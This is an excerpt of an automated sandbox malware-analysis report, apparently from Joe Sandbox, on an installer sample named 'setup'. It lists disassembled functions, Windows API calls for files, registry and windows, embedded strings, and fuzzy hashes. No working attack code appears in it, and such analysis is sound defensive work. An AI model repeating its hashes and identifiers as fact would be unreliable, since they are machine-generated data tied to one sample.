                                                                                                                          • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C276EC
                                                                                                                          • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C27700
                                                                                                                          • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C2770D
                                                                                                                          • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C2778A
                                                                                                                          • SetLastError.KERNEL32(00000057), ref: 00C2779F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateFile$CloseHandleMapping
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1663754159-0
                                                                                                                          • Opcode ID: 15db305eca9f1c0241abeb5a86dd20f84aba3b1240b98e303a15f770119b1bb6
                                                                                                                          • Instruction ID: 210b9967d1750ae1c4175df7cd3e475ccc10e46eeaaf4ca2047912025520a41b
                                                                                                                          • Opcode Fuzzy Hash: 15db305eca9f1c0241abeb5a86dd20f84aba3b1240b98e303a15f770119b1bb6
                                                                                                                          • Instruction Fuzzy Hash: F6218275605721FBDB225B76BCCCB9F7EA8EB49BA1F100225F516E65D0E7708900CBA0
                                                                                                                          Function 00C43638 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 389windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C43642
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00C4381A
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00C439E2
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C43A08
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C43A2A
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00C43AE7
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C43B0D
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C43B2F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3_
                                                                                                                          • String ID: :/\
                                                                                                                          • API String ID: 2009545923-2793184486
                                                                                                                          • Opcode ID: 41c2424e7c126380332c3d0eb5d182b347cf1a0584990cb120ccd09e87d741d5
                                                                                                                          • Instruction ID: afd2a2af1f6a1e534e13f940ae6919e989e66615380f93d557136d93790694de
                                                                                                                          • Opcode Fuzzy Hash: 41c2424e7c126380332c3d0eb5d182b347cf1a0584990cb120ccd09e87d741d5
                                                                                                                          • Instruction Fuzzy Hash: 12F13830600659DFCB14EB60CD99BACBBB5FF88300F154199E546AB2E2DB74AE49DF10
                                                                                                                          Function 00C60C30 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 302COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • xmlAddElementDecl: content == NULL for ELEMENT, xrefs: 00C60CDE
                                                                                                                          • xmlAddElementDecl: content != NULL for EMPTY, xrefs: 00C60C78
                                                                                                                          • malloc failed, xrefs: 00C60DE8, 00C60E43
                                                                                                                          • Internal: ELEMENT decl corrupted invalid type, xrefs: 00C60F47
                                                                                                                          • xmlAddElementDecl: content == NULL for MIXED, xrefs: 00C60CBC
                                                                                                                          • xmlAddElementDecl: content != NULL for ANY, xrefs: 00C60C9A
                                                                                                                          • xmlAddElementDecl: Table creation failed!, xrefs: 00C60D3B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Internal: ELEMENT decl corrupted invalid type$malloc failed$xmlAddElementDecl: Table creation failed!$xmlAddElementDecl: content != NULL for ANY$xmlAddElementDecl: content != NULL for EMPTY$xmlAddElementDecl: content == NULL for ELEMENT$xmlAddElementDecl: content == NULL for MIXED
                                                                                                                          • API String ID: 0-3980578837
                                                                                                                          • Opcode ID: bc4a0a39bf005dca0e7d5f83b1f086ce3ce4ac52e96e647beab76321d431ad58
                                                                                                                          • Instruction ID: 8a8b23a696e4f3a81d459edd2492914eeceab70b76c5ecc10c0c4cfd8f8161a6
                                                                                                                          • Opcode Fuzzy Hash: bc4a0a39bf005dca0e7d5f83b1f086ce3ce4ac52e96e647beab76321d431ad58
                                                                                                                          • Instruction Fuzzy Hash: 93A10471A00204ABDB309F68EC85B9B77A0EF04311F244679FC1CE7252E772DA65CB92
                                                                                                                          Function 00C1DD7D Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 255fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2BFB7: FindClose.KERNEL32(?,?,?,?,00C2BFB0,?,?,?,00000000,00000000,?,?,00C23EAD,?,*.*,00004014), ref: 00C2BFCB
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00C1DFC9
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          Strings
                                                                                                                          • *.*, xrefs: 00C1DDD3
                                                                                                                          • Failed to copy due to sharing violation. will use special trick to copy file., xrefs: 00C1E10D
                                                                                                                          • Removing source file "%s", xrefs: 00C1DFEC
                                                                                                                          • Remove source directory : "%s"., xrefs: 00C1E03B
                                                                                                                          • Copy file "%s" -> "%s", xrefs: 00C1DF46
                                                                                                                          • Copy file failed! Error: %d, xrefs: 00C1E127
                                                                                                                          • , xrefs: 00C1E0C8
                                                                                                                          • Failed to copy file (Error : %d)"%s", xrefs: 00C1E0B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteFileFindUpdateWindow
                                                                                                                          • String ID: $*.*$Copy file "%s" -> "%s"$Copy file failed! Error: %d$Failed to copy due to sharing violation. will use special trick to copy file.$Failed to copy file (Error : %d)"%s"$Remove source directory : "%s".$Removing source file "%s"
                                                                                                                          • API String ID: 1245518220-2100460131
                                                                                                                          • Opcode ID: e47c900b503fce4602cb5c59f2694a95f6fde97dc1f911d23dbd33cfa82bb977
                                                                                                                          • Instruction ID: df2982793fef6295b9eda1cab2415fb6218bc0a7fe5bb42e0a291f1b721214ed
                                                                                                                          • Opcode Fuzzy Hash: e47c900b503fce4602cb5c59f2694a95f6fde97dc1f911d23dbd33cfa82bb977
                                                                                                                          • Instruction Fuzzy Hash: 02A18171910129EADB20DB60CC99BEEB3B9EF15310F0001E9E80EA6191DB355FC5DF61
                                                                                                                          Function 00C17AB9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 148registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17AC0
                                                                                                                          • _strlen.LIBCMT ref: 00C17AF8
                                                                                                                          • _strlen.LIBCMT ref: 00C17B3F
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020006,?,00000000,00000000,00000044,00C1729C,?), ref: 00C17BB8
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C17BCC
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00C17BEC
                                                                                                                          • SHCopyKeyW.SHLWAPI(?,00000000,?,00000000), ref: 00C17BFE
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C17C10
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close_strlen$CopyCreateH_prolog3_Open
                                                                                                                          • String ID: Failed to copy registry value. Invalid parameters
                                                                                                                          • API String ID: 984027009-20749844
                                                                                                                          • Opcode ID: f66b8682a74800d4a1385248cd968e759888c04d9d87992a764bd3a9a09045f2
                                                                                                                          • Instruction ID: 233245310ea2d9d2d8ae1f3fe69fb7066bc22ef4e0ba94d1fdee4cf42fb5f98c
                                                                                                                          • Opcode Fuzzy Hash: f66b8682a74800d4a1385248cd968e759888c04d9d87992a764bd3a9a09045f2
                                                                                                                          • Instruction Fuzzy Hash: 12518E71A08218EBCB21DF95CC99EDE7B79EF06340F104225F415A70A1DB709F89EB90
                                                                                                                          Function 00C17951 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17958
                                                                                                                          • _strlen.LIBCMT ref: 00C17975
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000024,00C170C4,?), ref: 00C179B9
                                                                                                                          • GetFileAttributesW.KERNEL32(?,.bak,00000000,?,00000000), ref: 00C17A33
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00C17A6B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$H_prolog3_Move_strlen
                                                                                                                          • String ID: %s.bak_(%d)$.bak$Backuping file : "%s" -> "%s"$Failed to backup file : %s
                                                                                                                          • API String ID: 70799187-103640923
                                                                                                                          • Opcode ID: de3ba8ac185c63adec974e53d8c02673d4482dcb7925c884a544d56b0dc54668
                                                                                                                          • Instruction ID: 33a3a7ad91ae14fb9d74f3501e01b86e1459a822bf5a73e8d50a049674d6090b
                                                                                                                          • Opcode Fuzzy Hash: de3ba8ac185c63adec974e53d8c02673d4482dcb7925c884a544d56b0dc54668
                                                                                                                          • Instruction Fuzzy Hash: 57416D72904118AECB10EBA4CC469EEBBB8EF16324F144529F451B7091DB309F89EBA1
                                                                                                                          Function 00C2284C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(?), ref: 00C22886
                                                                                                                          • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 00C228B7
                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C228C0
                                                                                                                          • SendMessageW.USER32(?,00000030,?,00000001), ref: 00C228DE
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C228FB
                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 00C2290B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C22939
                                                                                                                          • SendMessageW.USER32(?,00000407,00000000,?), ref: 00C22965
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Rect$Window$ClientOffset
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 3701462380-2679148245
                                                                                                                          • Opcode ID: a46c9fc46a148c6d21cf47cf6e1711048879dec62177955c4d64ead0d599a58e
                                                                                                                          • Instruction ID: 1978ba83cb7bfe9268385c1c9d5a07b71021b99c5e5d94c97fbb68ffd22b4bd0
                                                                                                                          • Opcode Fuzzy Hash: a46c9fc46a148c6d21cf47cf6e1711048879dec62177955c4d64ead0d599a58e
                                                                                                                          • Instruction Fuzzy Hash: 81317E72A00219ABCF11EFA5DC88FEE7BA9EF5C310F110165FA05BB195D671AA40DB60
                                                                                                                          Function 00C32F71 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00C32F78
                                                                                                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 00C32F8F
                                                                                                                          • CallWindowProcW.USER32(?,?,00000110,?,?), ref: 00C32FEF
                                                                                                                            • Part of subcall function 00C334A5: GetWindowRect.USER32(0000001C,00000001), ref: 00C334DE
                                                                                                                            • Part of subcall function 00C334A5: GetWindow.USER32(0000001C,00000004), ref: 00C334FB
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 00C33012
                                                                                                                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 00C3301E
                                                                                                                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00C33029
                                                                                                                          • GlobalDeleteAtom.KERNEL32(?), ref: 00C33033
                                                                                                                            • Part of subcall function 00C33548: GetWindowRect.USER32(0000001C,00000017), ref: 00C33555
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C3307B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                                                                          • String ID: AfxOldWndProc423
                                                                                                                          • API String ID: 3351853316-1060338832
                                                                                                                          • Opcode ID: 5f0aa363773c5e0f508dd14a3179d6f57cf741c5bd1c295d555d58c208c56016
                                                                                                                          • Instruction ID: 781a155ae73d016dc439c5e125cc6c3c854c3333342794b52d4cd9c6bb806a04
                                                                                                                          • Opcode Fuzzy Hash: 5f0aa363773c5e0f508dd14a3179d6f57cf741c5bd1c295d555d58c208c56016
                                                                                                                          • Instruction Fuzzy Hash: EF319A72920258BBDF09AFB8CC59DFF7A79EF49310F14010AF502A6192CB359E01AB60
                                                                                                                          Function 00C2F3B8 Relevance: 15.5, APIs: 10, Instructions: 482COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ca9640f79d64b543b0d0168016c4622b40661e53f3d7ba0e62958e058bc7aae7
                                                                                                                          • Instruction ID: 9dae6c70829d5b51f7af7b41e71ca426ba541a7b25aa9a393040a759fe6ba8d1
                                                                                                                          • Opcode Fuzzy Hash: ca9640f79d64b543b0d0168016c4622b40661e53f3d7ba0e62958e058bc7aae7
                                                                                                                          • Instruction Fuzzy Hash: 5602E331A00629DFCB11DF69E894AAEB7B5FF49314B20417DE911AB760C771ED82CB90
                                                                                                                          Function 00C36E6B Relevance: 15.5, APIs: 10, Instructions: 467COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C36E72
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00C36F63
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C36FD4
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00C370D7
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C37118
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C371A3
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00C371D6
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C37243
                                                                                                                          • PathFindFileNameW.SHLWAPI(?,?), ref: 00C3733F
                                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 00C3736B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$File$FreeRemoveSpecTask$Find$ExtensionH_prolog3Name_memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1705699762-0
                                                                                                                          • Opcode ID: 4cbf24de33baec4212f26033ab35517f46f260e13d7f3a9f297120fcb89e0f28
                                                                                                                          • Instruction ID: 32f15475064693d0b698343f0b53e94ab1abe5d3cebd5caf7fa3115bb85f2a04
                                                                                                                          • Opcode Fuzzy Hash: 4cbf24de33baec4212f26033ab35517f46f260e13d7f3a9f297120fcb89e0f28
                                                                                                                          • Instruction Fuzzy Hash: 95125A71A1011ADFCF14DFA8C898EAEBBB5FF48314F144159E915AB3A1DB30AD05DB60
                                                                                                                          Function 00C384AE Relevance: 15.1, APIs: 10, Instructions: 137COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C384B5
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,00000005,00000024,00C1A49A,?,00000000,00000000), ref: 00C384F6
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C38502
                                                                                                                          • LockResource.KERNEL32(?,00000024,00C1A49A,?,00000000,00000000), ref: 00C38512
                                                                                                                          • GetDesktopWindow.USER32 ref: 00C38549
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C38554
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C38560
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C38644
                                                                                                                          • GetActiveWindow.USER32 ref: 00C3864E
                                                                                                                          • SetActiveWindow.USER32(00000000,?,00000024,00C1A49A,?,00000000,00000000), ref: 00C3865A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindH_prolog3_catchLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 723642982-0
                                                                                                                          • Opcode ID: b2a3b2a890d412e02659ca4c88e7c58b581ad8b858666367187ac190f8445950
                                                                                                                          • Instruction ID: 3b369a973a028fd47400a0b2803139d3980ec39eae05ebdb10896eedc2be23f8
                                                                                                                          • Opcode Fuzzy Hash: b2a3b2a890d412e02659ca4c88e7c58b581ad8b858666367187ac190f8445950
                                                                                                                          • Instruction Fuzzy Hash: 29516970A20716DBDF15AFB0C889BAEBBB5BF08710F040119F911A7292DF749E059BA0
                                                                                                                          Function 00C211B3 Relevance: 15.1, APIs: 10, Instructions: 125windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C211BA
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00C211C7
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00C211F7
                                                                                                                          • GetParent.USER32(000000FF), ref: 00C2124D
                                                                                                                          • IsWindow.USER32(?), ref: 00C21262
                                                                                                                          • SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C2128E
                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00C212AD
                                                                                                                          • GetParent.USER32(?), ref: 00C212D5
                                                                                                                          • IsWindow.USER32(?), ref: 00C212EA
                                                                                                                          • SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C21310
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
